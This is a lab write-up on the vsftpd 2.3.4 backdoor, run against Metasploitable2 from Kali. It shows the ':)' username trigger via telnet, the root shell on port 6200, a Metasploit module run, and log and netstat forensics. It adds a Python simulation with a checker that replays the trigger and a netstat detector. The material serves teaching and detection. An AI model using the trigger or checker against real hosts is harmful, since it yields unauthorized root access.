
- Systems used

Kali Linux

Metasploitable V2 Linux


- VSFTPD BUG

On port 21, Metasploitable2 runs vsftpd(vsftpd-2.3.4), a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it.


This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.


exploit/unix/ftp/vsftpd_234_backdoor 

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available.


> vsftpd 2.3.4 shipped with a backdoor: with vsftpd listening on port 21, sending a username that ends in ":)" makes the server open a shell listening on port 6200. Only copies of vsftpd-2.3.4.tar.gz distributed between June 30 and July 1, 2011 contain it.


- Lab

(kali)

1. Check the service version

# nmap -sV -p 21 192.168.17.0/24


Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-14 20:37 KST

Nmap scan report for 192.168.17.1

Host is up (0.00045s latency).

PORT   STATE    SERVICE VERSION

21/tcp filtered ftp

MAC Address: 00:50:56:C0:00:08 (VMware)


Nmap scan report for 192.168.17.2

Host is up (0.00035s latency).

PORT   STATE  SERVICE VERSION

21/tcp closed ftp

MAC Address: 00:50:56:E0:95:FA (VMware)


Nmap scan report for 192.168.17.100

Host is up (0.00026s latency).

PORT   STATE  SERVICE VERSION

21/tcp closed ftp

MAC Address: 00:0C:29:7C:D6:E6 (VMware)


Nmap scan report for 192.168.17.134

Host is up (0.00017s latency).

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.4

MAC Address: 00:0C:29:FA:DD:2A (VMware)

Service Info: OS: Unix


Nmap scan report for 192.168.17.254

Host is up (0.00046s latency).

PORT   STATE    SERVICE VERSION

21/tcp filtered ftp

MAC Address: 00:50:56:F6:FA:06 (VMware)


Nmap scan report for 192.168.17.50

Host is up (0.000045s latency).

PORT   STATE  SERVICE VERSION

21/tcp closed ftp


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 256 IP addresses (6 hosts up) scanned in 6.36 seconds



> A 2.3.4 banner does not by itself prove the backdoor is present: only copies of vsftpd-2.3.4.tar.gz downloaded during the two-day window were trojaned, and a clean build of the same version reports exactly the same banner. The version string only tells us which host to test.


2. Trigger the backdoor

# telnet 192.168.17.134 21


Trying 192.168.17.134...

Connected to 192.168.17.134.

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user back:)

331 Please specify the password.

pass aaaa

^]

telnet> quit

Connection closed.

 


3. Connect with telnet to the backdoor port, 6200

# telnet 192.168.17.134 6200


Trying 192.168.17.134...

Connected to 192.168.17.134.

Escape character is '^]'.

id;
uid=0(root) gid=0(root)
: command not found
hostname;
metasploitable
: command not found
exit;
Connection closed by foreign host.


> The shell answers as root straight away, with no authentication at all: the backdoor is present. The ': command not found' lines are an artefact of telnet, which ends every line with CR LF. The stray '\r' reaches the shell as a second command, which it reports as not found (the carriage return moves the cursor back to column 0, so the 'sh: ' prefix is overwritten on screen). That is why each command above is terminated with ';': it separates the real command from the '\r' so that id and hostname still run.
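
The manual steps above (read the banner, send USER with the smiley, send PASS, then connect to port 6200) as a script, together with the caveat from step 1 that the banner alone proves nothing. This is an added example written for this page; it is not code from the write-up, from vsftpd or from the Metasploit module. To run offline it talks to two simulated servers on loopback that are part of the example: one modelled on the trojaned build (a ':)' in the USER argument opens a second listening port, which answers `id` with canned text instead of running /bin/sh) and one that prints the same 2.3.4 banner but has no backdoor. The trigger condition (':)' anywhere in the username), the canned shell and the ephemeral ports standing in for 21 and 6200 are all assumptions of the simulation; `check_backdoor` itself defaults to the real ports, so against a lab target only the host changes.

```python
"""Added example: loopback simulation of the vsftpd 2.3.4 backdoor trigger
plus a checker that replays the manual telnet steps. Assumed: ':)' anywhere
in the USER argument triggers; the 'shell' is canned text, not /bin/sh."""
import socket
import threading

BANNER = b"220 (vsFTPd 2.3.4)\r\n"
SMILEY = b":)"              # bytes 0x3a 0x29, the backdoor trigger
LOOPBACK = "127.0.0.1"


def _listener(port: int) -> socket.socket:
    # Bound and listening before it is handed to a thread, so no startup race.
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((LOOPBACK, port))
    srv.listen(1)
    return srv


def _fake_shell(srv: socket.socket) -> None:
    # Simulated stand-in for the root /bin/sh the backdoor serves on port 6200.
    conn, _ = srv.accept()
    with srv, conn:
        for raw in conn.makefile("rb"):
            cmd = raw.strip()
            if cmd == b"id":
                conn.sendall(b"uid=0(root) gid=0(root)\n")
            elif cmd == b"exit":
                break
            else:
                conn.sendall(b"sh: " + cmd + b": not found\n")


def _fake_ftpd(srv: socket.socket, backdoored: bool, shell_port: int) -> None:
    # Minimal FTP control channel; clean and trojaned builds share the banner.
    conn, _ = srv.accept()
    with srv, conn:
        conn.sendall(BANNER)
        for raw in conn.makefile("rb"):
            verb, _, arg = raw.strip().partition(b" ")
            if verb.upper() == b"USER":
                if backdoored and SMILEY in arg:
                    # Trojaned build: open the shell port before replying 331.
                    threading.Thread(target=_fake_shell, daemon=True,
                                     args=(_listener(shell_port),)).start()
                conn.sendall(b"331 Please specify the password.\r\n")
            elif verb.upper() == b"QUIT":
                conn.sendall(b"221 Goodbye.\r\n")
                break
            # PASS: the write-up shows no reply before the client hangs up,
            # so the fake just keeps reading until the peer closes.


def start_fake_vsftpd(backdoored: bool) -> tuple:
    """Start one simulated server; returns (ftp_port, shell_port)."""
    ftp_srv = _listener(0)
    with socket.socket() as probe:          # borrow a free port to play '6200'
        probe.bind((LOOPBACK, 0))
        shell_port = probe.getsockname()[1]
    threading.Thread(target=_fake_ftpd, daemon=True,
                     args=(ftp_srv, backdoored, shell_port)).start()
    return ftp_srv.getsockname()[1], shell_port


def check_backdoor(host: str, ftp_port: int = 21, shell_port: int = 6200,
                   username: bytes = b"back" + SMILEY, timeout: float = 3.0) -> dict:
    """Replay the telnet steps. A 2.3.4 banner alone proves nothing; only the
    shell port answering after the smiley does, so both are reported."""
    seen = {"banner": "", "user_reply": "", "shell_open": False, "id": ""}
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        ctl_in = ctl.makefile("rb")
        seen["banner"] = ctl_in.readline().decode(errors="replace").strip()
        ctl.sendall(b"USER " + username + b"\r\n")
        seen["user_reply"] = ctl_in.readline().decode(errors="replace").strip()
        ctl.sendall(b"PASS aaaa\r\n")       # any password; do not wait for a reply
        ctl_in.close()
    # Control connection closed (the '^] quit' in the write-up); now probe 6200.
    try:
        sh = socket.create_connection((host, shell_port), timeout=timeout)
    except OSError:
        return seen                         # nothing listening: not trojaned
    with sh:
        seen["shell_open"] = True
        # Bare '\n': telnet's CR LF leaves a '\r' that sh runs as a second
        # command (': command not found'), which is why the write-up uses ';'.
        sh.sendall(b"id\n")
        seen["id"] = sh.makefile("rb").readline().decode(errors="replace").strip()
        sh.sendall(b"exit\n")
    return seen


if __name__ == "__main__":
    for trojaned in (True, False):
        ftp, shell = start_fake_vsftpd(trojaned)
        print("trojaned" if trojaned else "clean", check_backdoor(LOOPBACK, ftp, shell))
```

Running it prints one result per simulated build: the trojaned one reports `shell_open: True` and the root uid line, the clean one the same banner with `shell_open: False`. The checker deliberately records the banner and the shell probe separately, because the decision the write-up reaches in step 3 rests on the second, not the first.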


4. Attack through msfconsole (with packet capture)

# wireshark &

# msfconsole


msf > search vsftpd


Matching Modules

================


   Name                                  Disclosure Date  Rank       Description

   ----                                  ---------------  ----       -----------

   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.17.134
RHOST => 192.168.17.134
msf exploit(vsftpd_234_backdoor) > exploit 

[*] 192.168.17.134:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.17.134:21 - USER: 331 Please specify the password.
[+] 192.168.17.134:21 - Backdoor service has been spawned, handling...
[+] 192.168.17.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.17.50:34901 -> 192.168.17.134:6200) at 2017-11-14 20:42:36 +0900


id
uid=0(root) gid=0(root)
hostname
metasploitable



> We are in as root.

> Leave the session open rather than exiting, so the connection can be examined from the Metasploitable side.


Packet capture (Wireshark)


> The same exchange as above is visible on the wire: the USER/PASS commands on port 21 and then the commands typed into the shell on port 6200, all in clear text.


- Checking for the attack on the Metasploitable server

(meta)

$ sudo su -

# who

# w

# last | head -n 20

# cd /var/log

# cat secure

# cat messages

# cat auth.log

> None of these show any trace of the connection. That is to be expected: the backdoor shell is not a login session, so who, w and last (which read utmp/wtmp) never see it, and /var/log/secure does not exist on this Ubuntu-based image (auth.log is its equivalent here). Login records are the wrong place to look for it.


Checking which programs are running

# netstat -antp

> This lists every TCP socket together with the PID and name of the owning process. One ESTABLISHED connection stands out, on port 6200, the one the Metasploit session is still holding open. We look into it further.


> Looking up that PID shows a sh process running as root. The administrator did not start it, so this is a live compromise.
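
The netstat check above, turned into detection logic that runs over sample output. This is an added example for this page, not something from the write-up. The `netstat -antp` lines embedded below are constructed to match the state the write-up describes (vsftpd listening on 21, the Metasploit control connection, and the 6200 session owned by a sh process) and follow the net-tools column layout; the PIDs and the Kali source ports are made up. The rule flags a socket when its local port is the known backdoor port or when the owning program is a shell, because a shell holding a TCP socket is abnormal whatever the port, which also catches a backdoor rebuilt to listen elsewhere.

```python
"""Added example: flag the backdoor session in 'netstat -antp' output.
The sample is constructed for this page in the net-tools column layout."""

# Constructed sample, modelled on the state described in the write-up:
# vsftpd on 21, the Metasploit control connection, and the 6200 session
# owned by a root 'sh'. PIDs and client ports are invented.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      5194/vsftpd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5205/sshd
tcp        0      0 192.168.17.134:21       192.168.17.50:49210     ESTABLISHED 5298/vsftpd
tcp        0      0 192.168.17.134:6200     192.168.17.50:34901     ESTABLISHED 5300/sh
tcp6       0      0 :::80                   :::*                    LISTEN      -
"""

BACKDOOR_PORTS = {6200}                      # vsftpd 2.3.4 backdoor listener
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}


def parse_netstat(text: str) -> list:
    """Parse 'netstat -antp' rows into dicts; headers and non-TCP lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("tcp"):
            continue
        proto, _recvq, _sendq, local, foreign, state, owner = parts[:7]
        laddr, lport = local.rsplit(":", 1)
        faddr, fport = foreign.rsplit(":", 1)
        pid, _, prog = owner.partition("/")  # '-' when netstat cannot see the owner
        rows.append({
            "proto": proto, "laddr": laddr, "lport": int(lport),
            "faddr": faddr, "fport": fport, "state": state,
            "pid": int(pid) if pid.isdigit() else None, "prog": prog or None,
        })
    return rows


def suspicious_sockets(rows: list) -> list:
    """Return the rows that look like the backdoor, each with its reasons."""
    hits = []
    for row in rows:
        reasons = []
        if row["lport"] in BACKDOOR_PORTS:
            reasons.append("local port %d is the vsftpd 2.3.4 backdoor port" % row["lport"])
        if row["prog"] in SHELLS:
            reasons.append("socket owned by a shell (%s)" % row["prog"])
        if reasons:
            hits.append({**row, "reasons": reasons})
    return hits


def report(text: str = SAMPLE_NETSTAT) -> list:
    """One human-readable line per hit, suitable for an IR checklist or cron job."""
    return ["pid=%s prog=%s %s:%d <- %s:%s [%s]: %s" % (
                h["pid"], h["prog"], h["laddr"], h["lport"], h["faddr"], h["fport"],
                h["state"], "; ".join(h["reasons"]))
            for h in suspicious_sockets(parse_netstat(text))]


if __name__ == "__main__":
    for line in report():
        print(line)
```

On the sample only the 6200 row is reported, for both reasons, while the legitimate vsftpd and sshd listeners pass. To run it on a live host, feed it the output of `netstat -antp` (run as root, otherwise the PID/Program column shows `-` for other users' processes and the shell rule cannot fire) and follow up each hit with the PID, as the write-up does.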